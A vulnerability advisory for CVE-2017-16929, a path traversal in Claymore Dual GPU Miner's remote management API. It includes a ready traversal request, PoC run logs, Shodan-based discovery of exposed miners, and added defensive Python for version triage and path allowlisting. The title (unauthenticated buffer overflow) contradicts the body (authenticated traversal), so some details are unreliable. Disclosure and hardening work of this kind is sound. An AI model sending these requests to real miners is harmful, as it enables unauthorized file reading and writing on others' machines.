SSV-96932 (seebug.org, posted by Root)
Published: Dec 06, 2017

Claymore's Dual Ethereum Miner unauth stack buffer overflow (CVE-2017-16929)

Source: www.seebug.org
EPSS: 0.02 (Low), percentile 88.9%

VuNote

Author:       <github.com/tintinweb>
Ref:          https://github.com/tintinweb/pub/tree/master/pocs/cve-2017-16929
Version:      0.2
Date:         Nov 30th, 2017

Tag:          claymore dual ethereum decred crypto currency miner

Overview

Name:         Claymore's Dual ETH + DCR/SC/LBC/PASC GPU Miner
Vendor:       nanopool/claymore
References:   * https://github.com/nanopool/Claymore-Dual-Miner
              * https://bitcointalk.org/index.php?topic=1433925.0

Version:        10.1 [2]
Latest Version: 10.1 [2]
Other Versions: <= 10.1
Platform(s):    windows, linux
Technology:     C/C++

Vuln Classes:   CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Origin:         remote
Min. Privs.:    authenticated

Source:         Closed; runtime protection mechanisms

CVE:            CVE-2017-16929

Description

A specialised mining program with a remote management interface, for mining Ethereum / Decred / Siacoin / LBRY Credits /
Pascal Coin.

Quoted from the project website [1][2]:

    - Supports new "dual mining" mode: mining both Ethereum and Decred/Siacoin/Lbry/Pascal at the same time, with no impact on Ethereum mining speed. Ethereum-only mining mode is supported as well.
    - Effective Ethereum mining speed is higher by 3-5% because of a completely different miner code - much less invalid and outdated shares, higher GPU load, optimized OpenCL code, optimized assembler kernels.
    - Supports both AMD and nVidia cards, even mixed.
    - No DAG files.
    - Supports all Stratum versions for Ethereum: can be used directly without any proxies with all pools that support eth-proxy, qtminer or miner-proxy.
    - Supports Ethereum and Siacoin solo mining.
    - Supports both HTTP and Stratum for Decred.
    - Supports both HTTP and Stratum for Siacoin. Note: not all Stratum versions are supported currently for Siacoin.
    - Supports Stratum for Lbry and Pascal.
    - Supports failover.
    - Displays detailed mining information and hashrate for every card.
    - Supports remote monitoring and management.
    - Supports GPU selection, built-in GPU overclocking features and temperature management.
    - Supports Ethereum forks (Expanse, etc).
    - Windows and Linux versions.

Summary

> “FOMO driven security blindness.”

The remote management interface of Claymore Dual GPU Miner 10.1 is vulnerable to an authenticated relative directory
traversal, exploited by issuing a specially crafted remote management request. Because the supplied path is neither
validated nor sanitised, a remote attacker can read and write arbitrary files.

  • API calls
    • miner_getfile (read) … read any file
    • miner_file (write) … write any file

conditions:

  • authenticated
  • write: not in readonly mode

Successful exploitation allows an authenticated user to read/write arbitrary files with the permissions of the miner process.

See attached PoC.

Details

Service Discovery:

  • shodan: ‘eth result’ lists about 170-240 publicly available instances [3] with significant hash power
  • banner:
<html><body bgcolor="#000000" style="font-family: monospace;">
{"result": ["10.1 - ETH", "4286", "149336;7492;0", "30620;29877;28285;30605;29946", "0;0;0", "off;off;off;off;off", "62;65;51;64;61;75;51;67;62;72", "eth-us-east1.nanopool.org:9999", "0;1;0;0"]}<br><br><font color="#ff0000">Remote management: read-only mode, command miner_file ignored
</font><br><font color="#00ff00">ETH: 11/22/17-15:28:38 - SHARE FOUND - (GPU 3)
....
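The banner quoted above is enough to triage a miner found on one's own network: it carries the version (compare against v10.2, which the vendor changelog names as the fixed release) and states whether the management port is in read-only mode. The following Python is an added example, not the advisory's poc.py and not vendor code. The sample banner is constructed from the text above; the meaning of the positional fields in the result array beyond version and pool (uptime in minutes, per-GPU ETH hashrates) is assumed from the miner's API.txt rather than taken from this page, and the function names are mine.

```python
import json
import re

# Constructed sample banner, copied from the service-discovery section above
# (the trailing "...." continuation is omitted).
SAMPLE_BANNER = (
    '<html><body bgcolor="#000000" style="font-family: monospace;">\n'
    '{"result": ["10.1 - ETH", "4286", "149336;7492;0", '
    '"30620;29877;28285;30605;29946", "0;0;0", "off;off;off;off;off", '
    '"62;65;51;64;61;75;51;67;62;72", "eth-us-east1.nanopool.org:9999", '
    '"0;1;0;0"]}<br><br><font color="#ff0000">Remote management: read-only mode, '
    'command miner_file ignored\n</font><br><font color="#00ff00">'
    'ETH: 11/22/17-15:28:38 - SHARE FOUND - (GPU 3)\n'
)

# First release the vendor changelog names as fixing the remote-management issues.
FIXED_VERSION = (10, 2)


def parse_version(text):
    """'10.1 - ETH' -> (10, 1). Raises ValueError if no dotted number is found."""
    m = re.match(r"\s*(\d+)\.(\d+)", text)
    if not m:
        raise ValueError("no version in %r" % text)
    return int(m.group(1)), int(m.group(2))


def parse_banner(html):
    """Extract the miner_getstat1-style result array embedded in the banner.
    Field positions beyond version and pool follow the miner's API.txt as
    assumed here (uptime in minutes, per-GPU ETH hashrates), not this page."""
    m = re.search(r'\{"result":\s*\[.*?\]\}', html, re.S)
    if not m:
        raise ValueError("no result array in banner")
    result = json.loads(m.group(0))["result"]
    version, mode = (result[0].split(" - ") + ["?"])[:2]
    return {
        "version": parse_version(version),
        "mode": mode,
        "uptime_minutes": int(result[1]),            # assumed field meaning
        "gpu_count": len(result[3].split(";")),      # assumed: per-GPU hashrate list
        "pool": result[7],
        "readonly": "read-only mode" in html,
    }


def assess(info):
    """Findings for an exposed management port, from a defender's viewpoint."""
    findings = []
    if info["version"] < FIXED_VERSION:
        findings.append(
            "version %d.%d predates v10.2: authenticated clients can read arbitrary "
            "files via miner_getfile" % info["version"])
    if not info["readonly"]:
        findings.append("not in read-only mode: miner_file can write files")
    return findings


if __name__ == "__main__":
    info = parse_banner(SAMPLE_BANNER)
    print(info)
    for finding in assess(info):
        print("[!]", finding)
```

Note that read-only mode only blocks the write primitive (miner_file); on a pre-10.2 miner the read traversal via miner_getfile remains available to anyone who can authenticate, which is why the version check is reported separately from the mode check.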

Remote Management API overview:

# >nc -L -p 3333
{"id":0,"jsonrpc":"2.0","method":"miner_getstat1"}
{"id":0,"jsonrpc":"2.0","method":"miner_file","params":["epools.txt","<encoded>"]}
{"id":0,"jsonrpc":"2.0","method":"miner_getfile","params":["config.txt"]}
{"id":0,"jsonrpc":"2.0","method":"miner_restart"}
{"id":0,"jsonrpc":"2.0","method":"miner_reboot"}
{"id":0,"jsonrpc":"2.0","method":"control_gpu","params":["0", "1"]}
{"id":0,"jsonrpc":"2.0","method":"control_gpu","params":["-1", "0"]}
{"id":0,"jsonrpc":"2.0","method":"control_gpu","params":["0", "2"]}
{"id":0,"jsonrpc":"2.0","method":"miner_file","params":["config.txt","<encoded>"]}
{"id":0,"jsonrpc":"2.0","method":"miner_file","params":["dpools.txt","<encoded>"]}

Directory Traversal:

  • miner_file and miner_getfile

Neither command appears to sanitise the supplied path in any way, which allows relative path traversal.

# Vector: traversal
# Description: path traversal
# Result: retrieves any file
"traversal": {"id":0,
     "jsonrpc":"2.0",
     "method":"miner_getfile",
     "params":["../Claymore.s.Dual.Ethereum.Decred_Siacoin_Lbry_Pascal.AMD.NVIDIA.GPU.Miner.v10.0/config.txt"]}, ## <<-- path traversal

//see PoC vector: traversal
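To make the missing check concrete, the following Python is an added example covering the API overview and the traversal vector above; it is not the miner's code (which is closed source) and not the advisory's poc.py. It contrasts the unchecked join the advisory describes with a hardened handler that allowlists the bare file names the API overview exchanges (config.txt, epools.txt, dpools.txt) and confirms the canonical path stays inside the miner directory, then runs the advisory's own request lines, including the traversal vector, through that check. The base directory, the helper names and the readonly flag are assumptions.

```python
import json
import os

# File names exchanged by the remote management API, per the API overview above.
MANAGED_FILES = {"config.txt", "epools.txt", "dpools.txt"}
FILE_METHODS = {"miner_getfile": "read", "miner_file": "write"}

# Constructed sample requests, copied from the API overview and the traversal vector above.
SAMPLE_REQUESTS = [
    '{"id":0,"jsonrpc":"2.0","method":"miner_getstat1"}',
    '{"id":0,"jsonrpc":"2.0","method":"miner_getfile","params":["config.txt"]}',
    '{"id":0,"jsonrpc":"2.0","method":"miner_file","params":["epools.txt","<encoded>"]}',
    '{"id":0,"jsonrpc":"2.0","method":"miner_getfile","params":'
    '["../Claymore.s.Dual.Ethereum.Decred_Siacoin_Lbry_Pascal.AMD.NVIDIA.GPU.Miner.v10.0/config.txt"]}',
]


def unsafe_resolve(base_dir, name):
    """The vulnerable pattern: the client-supplied name is joined to the miner
    directory without any validation, so '..' segments walk out of it."""
    return os.path.join(base_dir, name)


def traversal_escapes(base_dir, name):
    """True if the unchecked join resolves outside base_dir (pure path arithmetic, no I/O)."""
    base = os.path.normpath(os.path.abspath(base_dir))
    target = os.path.normpath(unsafe_resolve(base, name))
    return os.path.commonpath([base, target]) != base


def safe_resolve(base_dir, name):
    """Hardened resolver: accept only a bare allowlisted file name, then confirm
    the canonical target still lies inside base_dir. Both separator flavours are
    split so a Windows-style '..\\x' is not treated as a single segment."""
    segments = name.replace("\\", "/").split("/")
    if len(segments) != 1 or segments[0] not in MANAGED_FILES:
        raise ValueError("file name not in allowlist: %r" % name)
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, segments[0]))
    if os.path.commonpath([base, target]) != base:
        raise ValueError("resolved path leaves the miner directory: %r" % name)
    return target


def is_allowed(base_dir, name):
    """Boolean wrapper around safe_resolve."""
    try:
        safe_resolve(base_dir, name)
        return True
    except ValueError:
        return False


def check_request(line, base_dir, readonly=True):
    """Classify one JSON-RPC request line as (method, verdict). The readonly flag
    models the miner's read-only mode, in which miner_file is ignored."""
    req = json.loads(line)
    method = req.get("method")
    if method not in FILE_METHODS:
        return method, "not a file operation"
    params = req.get("params") or []
    if not params or not isinstance(params[0], str):
        return method, "reject: missing file name"
    if FILE_METHODS[method] == "write" and readonly:
        return method, "reject: read-only mode"
    try:
        safe_resolve(base_dir, params[0])
    except ValueError as exc:
        return method, "reject: %s" % exc
    return method, "allow"


if __name__ == "__main__":
    # Assumed install directory; only used for path arithmetic here.
    base = "/opt/miner/Claymore.v10.1"
    for line in SAMPLE_REQUESTS:
        print(check_request(line, base, readonly=False))
```

The allowlist does most of the work: because the API only ever needs three fixed file names, there is no reason to accept separators at all, and the realpath containment check is a second line of defence against a symlinked or renamed install directory. Deployed miners cannot apply this themselves, so for 10.1 the practical mitigations remain the vendor's own: upgrade to 10.2 and keep the management port off untrusted networks.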

See attached PoC.

Proof of Concept

Prerequisites:

  • compatible AMD/NVidia hardware

  1. Start the miner in read/write mode with no password set, for testing:
#> EthDcrMiner64.exe -epool http://192.168.0.1:8545 -mport 3333
...
  2. Run poc.py --vector=traversal <target> (we expect EthDcrMiner64.exe to be placed in a directory called /Claymore.s.Dual.Ethereum.Decred_Siacoin_Lbry_Pascal.AMD.NVIDIA.GPU.Miner.v10.0):
[poc.py -             <module>() ][    INFO] --start--
[poc.py -             <module>() ][    INFO] # Claymore's Dual ETH + DCR/SC/LBC/PASC GPU Miner - Remote Buffer Overwrite
[poc.py -             <module>() ][    INFO] # github.com/tintinweb
[poc.py -         iter_targets() ][ WARNING] shodan apikey missing! shodan support disabled.
[poc.py -             <module>() ][    INFO] [i] Target: 127.0.0.1:3333
[poc.py -             <module>() ][    INFO] [+] connected.
[poc.py -             <module>() ][   DEBUG] <-- 1048 '{"id": 0, "error": null, "result": ["../Claymore.s.Dual.Ethereum.Decred_Siacoin_Lbry_Pascal.AMD.NVIDIA.GPU.Miner.v10.0/config.txt", "<encoded file data>"]}'
[poc.py -             <module>() ][    INFO] --done--
  3. EthDcrMiner returns the file's content, as shown in the logs:
...
 DCR: 11/22/17-22:56:06 - New job from pasc-eu2.nanopool.org:15555
Remote management: file ..\Claymore.s.Dual.Ethereum.Decred_Siacoin_Lbry_Pascal.AMD.NVIDIA.GPU.Miner.v10.0\config.txt was uploaded
 DCR: 11/22/17-22:56:16 - New job from pasc-eu2.nanopool.org:15555
...

Patch

N/A - closed source :/

Notes

  • Timeline

    11/22/2017 - vendor contact: report sent
    11/23/2017 - vendor response:
                 fixed version 10.2 ready and publicly available
                 request for 7+ day embargo
                 vendor statement:
                       The root cause is that remote management was designed to be used in the local network only.
                       But some "smart" people want to share ports to everyone and then catch problems. I will close
                       the issues you found, but an attacker will be able to do something bad anyway, at least execute a DDoS
                       to prevent remote management from working as expected.
    12/04/2017 - public disclosure
    
  • Vendor Changelog

Latest version is v10.2:

    - fixed critical issues in remote management feature (attacker could crash miner even in read-only mode).
    - now miner supports up to #299 epoch.
    - in rare cases ADL API calls can hang, now watchdog checks it as well.
    - improved "-minspeed" option, check readme for details.
    - added "miner_getstat2" command to remote management, check "API.txt" for details.
    - EthMan: added detailed stats mode in main window.
    - a few minor improvements in both miner and EthMan.

  • Runtime Protection

    * Linux: packer / just compression
      * gdb
    * Windows: protector / anti-debug, vmprotect?
      * x64dbg: DbgUiRemoteBreakin <- RET
